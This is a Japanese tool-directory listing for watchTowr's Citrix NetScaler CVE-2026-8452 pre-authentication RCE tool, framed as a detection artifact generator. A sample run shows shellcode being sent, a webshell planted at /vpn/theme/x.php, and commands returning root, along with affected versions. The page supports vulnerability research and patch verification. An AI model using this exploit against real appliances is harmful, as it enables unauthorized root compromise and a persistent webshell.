Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
watchTowr-vs-Citrix-Netscaler-PreAuth-RCE-CVE-2026-8452 — CVE-2026-8452 PreAuth RCE | Kitploit
ツール/GitHubGitHub/watchtowrlabs/watchtowr-vs-citrix-netscaler-preauth-rce-cve-2026-8452
脆弱性分析エクスプロイトウェブアプリケーション悪用レッドチーミングシェルコード生成ペイロード開発
GitHubwatchtowrlabs/watchtowr-vs-citrix-netscaler-preauth-rce-cve-2026-8452

watchTowr-vs-Citrix-Netscaler-PreAuth-RCE-CVE-2026-8452

CVE-2026-8452 PreAuth RCE

リポジトリを見る
61151126日前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

watchTowr-vs-Citrix-Netscaler-PreAuth-RCE

Citrix NetScaler CVE-2026-8452 用検出アーティファクトジェネレーター

技術的な詳細はブログ記事をご覧ください。

実行例

root@kitploit:~
python3 watchTowr-vs-Citrix-Netscaler-PreAuth-RCE.py --target https://172.16.5.12:9443/
                     __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                          \/          \/     \/

        watchTowr-vs-Citrix-Netscaler-PreAuth-RCE.py

        (*) Citrix NetScaler PreAuth Heap overflow to RCE Detection Artifact Generator

          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2026-8452]

[*] Connecting to endpoint...
[*] target AAA service is responsive
[*] building shellcode
[+] shellcode size: 268 bytes
[*] triggering jmp rax to 0x112d30180
[*] sent..
[+] webshell will be at https://172.16.5.12:9443/vpn/theme/x.php?0=uname+-a;id
[+] web shell output:


FreeBSD something 11.4-NETSCALER-13.1 FreeBSD 11.4-NETSCALER-13.1 #0 ef731ca813f0(heads/artesa_30_52)-dirty: Wed Aug 24 08:24:55 PDT 2022     root@sjc-bld-bsd114-215:/usr/obj/usr/home/build/adc/usr.src/sys/NS64  amd64
uid=65534(nobody) gid=65534(nobody) euid=0(root) egid=0(wheel) groups=0(wheel)
uid=65534(nobody) gid=65534(nobody) euid=0(root) egid=0(wheel) groups=0(wheel)

すべてのオフセット/アドレスは NetScaler のバージョン 13.1-30.52 用にハードコードされています。

影響を受けるバージョン

この脆弱性は、NetScaler アプライアンスが SAML をサービスプロバイダー (SP) または ID プロバイダー (IdP) として使用するように構成されている場合に到達可能です。

Citrix は以下のバージョンが影響を受けるとしています:

NetScaler ADC および NetScaler Gateway 14.1(14.1-72.61 より前) NetScaler ADC および NetScaler Gateway 13.1(13.1-63.18 より前)

watchTowr Labs をフォロー

最新のセキュリティ研究については、watchTowr Labs チームをフォローしてください。

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
ツールをダウンロード